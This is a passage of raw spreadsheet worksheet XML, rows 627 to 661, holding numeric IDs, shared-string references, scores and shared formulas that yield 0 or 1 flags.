        <v>0.0</v>
      </c>
      <c r="I627" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J627" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K627" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L627" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O627" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="62">
        <v>21311.0</v>
      </c>
      <c r="B628" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C628" s="63" t="s">
        <v>2075</v>
      </c>
      <c r="D628" s="62" t="s">
        <v>2076</v>
      </c>
      <c r="E628" s="62" t="s">
        <v>2077</v>
      </c>
      <c r="F628" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G628" s="62">
        <v>0.95</v>
      </c>
      <c r="H628" s="64">
        <v>0.0</v>
      </c>
      <c r="I628" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J628" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K628" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L628" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O628" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="62">
        <v>21754.0</v>
      </c>
      <c r="B629" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C629" s="63" t="s">
        <v>2078</v>
      </c>
      <c r="D629" s="62" t="s">
        <v>2079</v>
      </c>
      <c r="E629" s="62" t="s">
        <v>2080</v>
      </c>
      <c r="F629" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G629" s="62">
        <v>0.95</v>
      </c>
      <c r="H629" s="64">
        <v>1.0</v>
      </c>
      <c r="I629" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J629" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K629" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L629" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O629" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="62">
        <v>22071.0</v>
      </c>
      <c r="B630" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C630" s="63" t="s">
        <v>2081</v>
      </c>
      <c r="D630" s="62" t="s">
        <v>2082</v>
      </c>
      <c r="E630" s="62" t="s">
        <v>2083</v>
      </c>
      <c r="F630" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G630" s="62">
        <v>0.95</v>
      </c>
      <c r="H630" s="64">
        <v>1.0</v>
      </c>
      <c r="I630" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J630" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K630" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L630" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O630" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="62">
        <v>22616.0</v>
      </c>
      <c r="B631" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C631" s="63" t="s">
        <v>2084</v>
      </c>
      <c r="D631" s="62" t="s">
        <v>2085</v>
      </c>
      <c r="E631" s="62" t="s">
        <v>2086</v>
      </c>
      <c r="F631" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G631" s="62">
        <v>0.9</v>
      </c>
      <c r="H631" s="64">
        <v>1.0</v>
      </c>
      <c r="I631" s="64" t="s">
        <v>2087</v>
      </c>
      <c r="J631" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K631" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L631" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O631" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="62">
        <v>22657.0</v>
      </c>
      <c r="B632" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C632" s="63" t="s">
        <v>2088</v>
      </c>
      <c r="D632" s="62" t="s">
        <v>2089</v>
      </c>
      <c r="E632" s="62" t="s">
        <v>2090</v>
      </c>
      <c r="F632" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G632" s="62">
        <v>0.9</v>
      </c>
      <c r="H632" s="64">
        <v>0.0</v>
      </c>
      <c r="I632" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J632" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K632" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L632" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O632" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="62">
        <v>22986.0</v>
      </c>
      <c r="B633" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C633" s="63" t="s">
        <v>2091</v>
      </c>
      <c r="D633" s="62" t="s">
        <v>2092</v>
      </c>
      <c r="E633" s="62" t="s">
        <v>2093</v>
      </c>
      <c r="F633" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G633" s="62">
        <v>0.95</v>
      </c>
      <c r="H633" s="64">
        <v>1.0</v>
      </c>
      <c r="I633" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J633" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K633" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L633" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O633" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="62">
        <v>22989.0</v>
      </c>
      <c r="B634" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C634" s="63" t="s">
        <v>2094</v>
      </c>
      <c r="D634" s="62" t="s">
        <v>2095</v>
      </c>
      <c r="E634" s="62" t="s">
        <v>2096</v>
      </c>
      <c r="F634" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G634" s="62">
        <v>0.9</v>
      </c>
      <c r="H634" s="64">
        <v>1.0</v>
      </c>
      <c r="I634" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J634" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K634" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L634" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O634" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="62">
        <v>23163.0</v>
      </c>
      <c r="B635" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C635" s="63" t="s">
        <v>2097</v>
      </c>
      <c r="D635" s="62" t="s">
        <v>2098</v>
      </c>
      <c r="E635" s="62" t="s">
        <v>2099</v>
      </c>
      <c r="F635" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G635" s="62">
        <v>0.9</v>
      </c>
      <c r="H635" s="64">
        <v>0.0</v>
      </c>
      <c r="I635" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J635" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K635" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L635" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O635" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="62">
        <v>23712.0</v>
      </c>
      <c r="B636" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C636" s="63" t="s">
        <v>2100</v>
      </c>
      <c r="D636" s="62" t="s">
        <v>2101</v>
      </c>
      <c r="E636" s="62" t="s">
        <v>2102</v>
      </c>
      <c r="F636" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G636" s="62">
        <v>0.95</v>
      </c>
      <c r="H636" s="64">
        <v>1.0</v>
      </c>
      <c r="I636" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J636" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K636" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L636" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O636" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="62">
        <v>23981.0</v>
      </c>
      <c r="B637" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C637" s="63" t="s">
        <v>2103</v>
      </c>
      <c r="D637" s="62" t="s">
        <v>2104</v>
      </c>
      <c r="E637" s="62" t="s">
        <v>2105</v>
      </c>
      <c r="F637" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G637" s="62">
        <v>0.9</v>
      </c>
      <c r="H637" s="64">
        <v>1.0</v>
      </c>
      <c r="I637" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J637" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K637" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L637" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O637" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="62">
        <v>24152.0</v>
      </c>
      <c r="B638" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C638" s="63" t="s">
        <v>2106</v>
      </c>
      <c r="D638" s="62" t="s">
        <v>2107</v>
      </c>
      <c r="E638" s="62" t="s">
        <v>2108</v>
      </c>
      <c r="F638" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G638" s="62">
        <v>0.95</v>
      </c>
      <c r="H638" s="64">
        <v>1.0</v>
      </c>
      <c r="I638" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J638" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K638" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L638" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O638" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="62">
        <v>24632.0</v>
      </c>
      <c r="B639" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C639" s="63" t="s">
        <v>2109</v>
      </c>
      <c r="D639" s="62" t="s">
        <v>2110</v>
      </c>
      <c r="E639" s="62" t="s">
        <v>2111</v>
      </c>
      <c r="F639" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G639" s="62">
        <v>0.95</v>
      </c>
      <c r="H639" s="64">
        <v>1.0</v>
      </c>
      <c r="I639" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J639" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K639" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L639" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O639" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="62">
        <v>24886.0</v>
      </c>
      <c r="B640" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C640" s="63" t="s">
        <v>2112</v>
      </c>
      <c r="D640" s="62" t="s">
        <v>2113</v>
      </c>
      <c r="E640" s="62" t="s">
        <v>2114</v>
      </c>
      <c r="F640" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G640" s="62">
        <v>0.95</v>
      </c>
      <c r="H640" s="64">
        <v>1.0</v>
      </c>
      <c r="I640" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J640" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K640" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L640" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O640" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="62">
        <v>24910.0</v>
      </c>
      <c r="B641" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C641" s="63" t="s">
        <v>2115</v>
      </c>
      <c r="D641" s="62" t="s">
        <v>2116</v>
      </c>
      <c r="E641" s="62" t="s">
        <v>2117</v>
      </c>
      <c r="F641" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G641" s="62">
        <v>0.9</v>
      </c>
      <c r="H641" s="64">
        <v>0.0</v>
      </c>
      <c r="I641" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J641" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K641" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L641" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O641" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="62">
        <v>25026.0</v>
      </c>
      <c r="B642" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C642" s="63" t="s">
        <v>2118</v>
      </c>
      <c r="D642" s="62" t="s">
        <v>2119</v>
      </c>
      <c r="E642" s="62" t="s">
        <v>2120</v>
      </c>
      <c r="F642" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G642" s="62">
        <v>0.9</v>
      </c>
      <c r="H642" s="64">
        <v>1.0</v>
      </c>
      <c r="I642" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J642" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K642" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L642" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O642" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="62">
        <v>25851.0</v>
      </c>
      <c r="B643" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C643" s="63" t="s">
        <v>2121</v>
      </c>
      <c r="D643" s="62" t="s">
        <v>2122</v>
      </c>
      <c r="E643" s="62" t="s">
        <v>2123</v>
      </c>
      <c r="F643" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G643" s="62">
        <v>0.95</v>
      </c>
      <c r="H643" s="64">
        <v>0.0</v>
      </c>
      <c r="I643" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J643" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K643" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L643" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O643" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="62">
        <v>25871.0</v>
      </c>
      <c r="B644" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C644" s="63" t="s">
        <v>2124</v>
      </c>
      <c r="D644" s="62" t="s">
        <v>2125</v>
      </c>
      <c r="E644" s="62" t="s">
        <v>2126</v>
      </c>
      <c r="F644" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G644" s="62">
        <v>0.95</v>
      </c>
      <c r="H644" s="64">
        <v>0.0</v>
      </c>
      <c r="I644" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J644" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K644" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L644" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O644" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="62">
        <v>25881.0</v>
      </c>
      <c r="B645" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C645" s="63" t="s">
        <v>2127</v>
      </c>
      <c r="D645" s="62" t="s">
        <v>2128</v>
      </c>
      <c r="E645" s="62" t="s">
        <v>2129</v>
      </c>
      <c r="F645" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G645" s="62">
        <v>0.95</v>
      </c>
      <c r="H645" s="64">
        <v>1.0</v>
      </c>
      <c r="I645" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J645" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K645" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L645" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O645" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="62">
        <v>275.0</v>
      </c>
      <c r="B646" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C646" s="63" t="s">
        <v>2130</v>
      </c>
      <c r="D646" s="62" t="s">
        <v>2131</v>
      </c>
      <c r="E646" s="62" t="s">
        <v>2132</v>
      </c>
      <c r="F646" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G646" s="62">
        <v>0.8</v>
      </c>
      <c r="H646" s="64">
        <v>1.0</v>
      </c>
      <c r="I646" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J646" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K646" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L646" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O646" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="62">
        <v>277.0</v>
      </c>
      <c r="B647" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C647" s="63" t="s">
        <v>2133</v>
      </c>
      <c r="D647" s="62" t="s">
        <v>2134</v>
      </c>
      <c r="E647" s="62" t="s">
        <v>2135</v>
      </c>
      <c r="F647" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G647" s="62">
        <v>0.8</v>
      </c>
      <c r="H647" s="64" t="s">
        <v>1338</v>
      </c>
      <c r="I647" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J647" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K647" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L647" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O647" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="62">
        <v>303.0</v>
      </c>
      <c r="B648" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C648" s="63" t="s">
        <v>2136</v>
      </c>
      <c r="D648" s="62" t="s">
        <v>2137</v>
      </c>
      <c r="E648" s="62" t="s">
        <v>2138</v>
      </c>
      <c r="F648" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G648" s="62">
        <v>0.85</v>
      </c>
      <c r="H648" s="64">
        <v>0.0</v>
      </c>
      <c r="I648" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J648" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K648" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L648" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O648" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="62">
        <v>417.0</v>
      </c>
      <c r="B649" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C649" s="63" t="s">
        <v>2139</v>
      </c>
      <c r="D649" s="62" t="s">
        <v>2140</v>
      </c>
      <c r="F649" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G649" s="62">
        <v>0.85</v>
      </c>
      <c r="H649" s="64">
        <v>0.0</v>
      </c>
      <c r="I649" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J649" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K649" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L649" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O649" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="62">
        <v>443.0</v>
      </c>
      <c r="B650" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C650" s="63" t="s">
        <v>2141</v>
      </c>
      <c r="D650" s="62" t="s">
        <v>2142</v>
      </c>
      <c r="E650" s="62" t="s">
        <v>2143</v>
      </c>
      <c r="F650" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G650" s="62">
        <v>0.85</v>
      </c>
      <c r="H650" s="64">
        <v>0.0</v>
      </c>
      <c r="I650" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J650" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K650" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L650" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O650" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="62">
        <v>541.0</v>
      </c>
      <c r="B651" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C651" s="63" t="s">
        <v>2144</v>
      </c>
      <c r="D651" s="62" t="s">
        <v>2145</v>
      </c>
      <c r="E651" s="62" t="s">
        <v>2146</v>
      </c>
      <c r="F651" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G651" s="62">
        <v>0.85</v>
      </c>
      <c r="H651" s="64">
        <v>0.0</v>
      </c>
      <c r="I651" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J651" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K651" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L651" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O651" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="62">
        <v>655.0</v>
      </c>
      <c r="B652" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C652" s="63" t="s">
        <v>2147</v>
      </c>
      <c r="D652" s="62" t="s">
        <v>2148</v>
      </c>
      <c r="E652" s="62" t="s">
        <v>2149</v>
      </c>
      <c r="F652" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G652" s="62">
        <v>0.85</v>
      </c>
      <c r="H652" s="64">
        <v>1.0</v>
      </c>
      <c r="I652" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J652" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K652" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L652" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O652" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="62">
        <v>669.0</v>
      </c>
      <c r="B653" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C653" s="63" t="s">
        <v>2150</v>
      </c>
      <c r="D653" s="62" t="s">
        <v>2151</v>
      </c>
      <c r="E653" s="62" t="s">
        <v>2152</v>
      </c>
      <c r="F653" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G653" s="62">
        <v>0.8</v>
      </c>
      <c r="H653" s="64">
        <v>0.0</v>
      </c>
      <c r="I653" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J653" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K653" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L653" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O653" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="62">
        <v>755.0</v>
      </c>
      <c r="B654" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C654" s="63" t="s">
        <v>2153</v>
      </c>
      <c r="D654" s="62" t="s">
        <v>2154</v>
      </c>
      <c r="E654" s="62" t="s">
        <v>2155</v>
      </c>
      <c r="F654" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G654" s="62">
        <v>0.85</v>
      </c>
      <c r="H654" s="64">
        <v>0.0</v>
      </c>
      <c r="I654" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J654" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K654" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L654" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O654" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="62">
        <v>783.0</v>
      </c>
      <c r="B655" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C655" s="63" t="s">
        <v>2156</v>
      </c>
      <c r="D655" s="62" t="s">
        <v>2157</v>
      </c>
      <c r="E655" s="62" t="s">
        <v>2158</v>
      </c>
      <c r="F655" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G655" s="62">
        <v>0.9</v>
      </c>
      <c r="H655" s="64">
        <v>0.0</v>
      </c>
      <c r="I655" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J655" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K655" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L655" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O655" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="62">
        <v>785.0</v>
      </c>
      <c r="B656" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C656" s="63" t="s">
        <v>2159</v>
      </c>
      <c r="D656" s="62" t="s">
        <v>2160</v>
      </c>
      <c r="E656" s="62" t="s">
        <v>2161</v>
      </c>
      <c r="F656" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G656" s="62">
        <v>0.9</v>
      </c>
      <c r="H656" s="64">
        <v>1.0</v>
      </c>
      <c r="I656" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J656" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K656" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L656" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O656" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="62">
        <v>832.0</v>
      </c>
      <c r="B657" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C657" s="63" t="s">
        <v>2162</v>
      </c>
      <c r="D657" s="62" t="s">
        <v>2163</v>
      </c>
      <c r="E657" s="62" t="s">
        <v>2164</v>
      </c>
      <c r="F657" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G657" s="62">
        <v>0.85</v>
      </c>
      <c r="H657" s="64">
        <v>0.0</v>
      </c>
      <c r="I657" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J657" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K657" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L657" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O657" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="62">
        <v>916.0</v>
      </c>
      <c r="B658" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C658" s="63" t="s">
        <v>2165</v>
      </c>
      <c r="D658" s="62" t="s">
        <v>2166</v>
      </c>
      <c r="E658" s="62" t="s">
        <v>2167</v>
      </c>
      <c r="F658" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G658" s="62">
        <v>0.8</v>
      </c>
      <c r="H658" s="64">
        <v>0.0</v>
      </c>
      <c r="I658" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J658" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K658" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L658" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O658" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="62">
        <v>961.0</v>
      </c>
      <c r="B659" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C659" s="63" t="s">
        <v>2168</v>
      </c>
      <c r="D659" s="62" t="s">
        <v>2169</v>
      </c>
      <c r="E659" s="62" t="s">
        <v>2170</v>
      </c>
      <c r="F659" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G659" s="62">
        <v>0.9</v>
      </c>
      <c r="H659" s="64">
        <v>0.0</v>
      </c>
      <c r="I659" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J659" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K659" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L659" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O659" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="62">
        <v>1194.0</v>
      </c>
      <c r="B660" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C660" s="63" t="s">
        <v>2171</v>
      </c>
      <c r="D660" s="62" t="s">
        <v>2172</v>
      </c>
      <c r="E660" s="62" t="s">
        <v>2173</v>
      </c>
      <c r="F660" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G660" s="62">
        <v>0.85</v>
      </c>
      <c r="H660" s="64">
        <v>0.0</v>
      </c>
      <c r="I660" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J660" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K660" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L660" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O660" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="62">
        <v>1247.0</v>
      </c>
      <c r="B661" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C661" s="63" t="s">
        <v>2174</v>
      </c>
      <c r="D661" s="62" t="s">
        <v>2175</v>
      </c>
      <c r="E661" s="62" t="s">
